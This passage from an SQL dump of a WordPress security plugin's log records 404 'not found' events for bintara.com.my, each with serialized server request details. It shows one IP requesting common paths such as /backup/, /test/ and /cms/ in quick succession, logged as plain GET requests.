nFhdaVmZheZAAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571817830.8989\";s:12:\"REQUEST_TIME\";s:10:\"1571817830\";}}','notice','2019-10-23 08:03:54','2019-10-23 08:03:51',35358048,37155520,'https://bintara.com.my/wordpress/',1,0,'51.75.95.185'),(28850,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:4:\"/wp/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:26:\"https://bintara.com.my/wp/\";s:19:\"REDIRECT_SCRIPT_URL\";s:4:\"/wp/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAJc@HARMCuuKQiJT8P9wAAAMw\";s:12:\"REDIRECT_URL\";s:4:\"/wp/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"62092\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:26:\"https://bintara.com.my/wp/\";s:10:\"SCRIPT_URL\";s:4:\"/wp/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAJc@HARMCuuKQiJT8P9wAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571817844.0846\";s:12:\"REQUEST_TIME\";s:10:\"1571817844\";}}','notice','2019-10-23 08:04:08','2019-10-23 08:04:05',34965832,36772608,'https://bintara.com.my/wp/',1,0,'51.75.95.185'),(28851,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/blog/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAJf3lonjnFhdaVmZhecQAAAQQ\";s:12:\"REDIRECT_URL\";s:6:\"/blog/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:10:\"SCRIPT_URL\";s:6:\"/blog/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAJf3lonjnFhdaVmZhecQAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571817855.8738\";s:12:\"REQUEST_TIME\";s:10:\"1571817855\";}}','notice','2019-10-23 08:04:18','2019-10-23 08:04:16',34968352,36778808,'https://bintara.com.my/blog/',1,0,'51.75.95.185'),(28852,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/old/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/old/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/old/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAJo5Rr7NRBVHKuKoMf@gAAAIc\";s:12:\"REDIRECT_URL\";s:5:\"/old/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"55640\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/old/\";s:10:\"SCRIPT_URL\";s:5:\"/old/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAJo5Rr7NRBVHKuKoMf@gAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571817891.2178\";s:12:\"REQUEST_TIME\";s:10:\"1571817891\";}}','notice','2019-10-23 08:04:53','2019-10-23 08:04:51',34966136,36774920,'https://bintara.com.my/old/',1,0,'51.75.95.185'),(28853,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/test/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/test/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAJspRr7NRBVHKuKoMgAgAAAJU\";s:12:\"REDIRECT_URL\";s:6:\"/test/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"60944\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:10:\"SCRIPT_URL\";s:6:\"/test/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAJspRr7NRBVHKuKoMgAgAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571817906.5585\";s:12:\"REQUEST_TIME\";s:10:\"1571817906\";}}','notice','2019-10-23 08:05:11','2019-10-23 08:05:07',34965808,36771280,'https://bintara.com.my/test/',1,0,'51.75.95.185'),(28854,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/main/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/main/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/main/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAJwXIIkjpJzJ2025LHrAAAAEo\";s:12:\"REDIRECT_URL\";s:6:\"/main/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"51191\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/main/\";s:10:\"SCRIPT_URL\";s:6:\"/main/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAJwXIIkjpJzJ2025LHrAAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571817921.2326\";s:12:\"REQUEST_TIME\";s:10:\"1571817921\";}}','notice','2019-10-23 08:05:23','2019-10-23 08:05:22',34968352,36778808,'https://bintara.com.my/main/',1,0,'51.75.95.185'),(28855,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/site/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/site/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/site/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAJz3IIkjpJzJ2025LHrQAAAFM\";s:12:\"REDIRECT_URL\";s:6:\"/site/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"59217\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/site/\";s:10:\"SCRIPT_URL\";s:6:\"/site/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAJz3IIkjpJzJ2025LHrQAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571817935.6438\";s:12:\"REQUEST_TIME\";s:10:\"1571817935\";}}','notice','2019-10-23 08:05:38','2019-10-23 08:05:36',34968352,36778808,'https://bintara.com.my/site/',1,0,'51.75.95.185'),(28856,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/backup/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/backup/\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/backup/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAJ2uHARMCuuKQiJT8QDAAAAMw\";s:12:\"REDIRECT_URL\";s:8:\"/backup/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"54689\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/backup/\";s:10:\"SCRIPT_URL\";s:8:\"/backup/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAJ2uHARMCuuKQiJT8QDAAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571817946.866\";s:12:\"REQUEST_TIME\";s:10:\"1571817946\";}}','notice','2019-10-23 08:05:49','2019-10-23 08:05:47',34968088,36776792,'https://bintara.com.my/backup/',1,0,'51.75.95.185'),(28857,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/demo/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/demo/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAJ5ZRr7NRBVHKuKoMgIgAAAIY\";s:12:\"REDIRECT_URL\";s:6:\"/demo/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"64535\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/demo/\";s:10:\"SCRIPT_URL\";s:6:\"/demo/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAJ5ZRr7NRBVHKuKoMgIgAAAIY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571817957.4616\";s:12:\"REQUEST_TIME\";s:10:\"1571817957\";}}','notice','2019-10-23 08:05:59','2019-10-23 08:05:57',34968352,36778808,'https://bintara.com.my/demo/',1,0,'51.75.95.185'),(28858,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/tmp/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/tmp/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/tmp/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAKE5Rr7NRBVHKuKoMgNwAAAIM\";s:12:\"REDIRECT_URL\";s:5:\"/tmp/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"61034\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/tmp/\";s:10:\"SCRIPT_URL\";s:5:\"/tmp/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAKE5Rr7NRBVHKuKoMgNwAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571818003.2821\";s:12:\"REQUEST_TIME\";s:10:\"1571818003\";}}','notice','2019-10-23 08:06:45','2019-10-23 08:06:43',34965912,36761600,'https://bintara.com.my/tmp/',1,0,'51.75.95.185'),(28859,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/cms/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 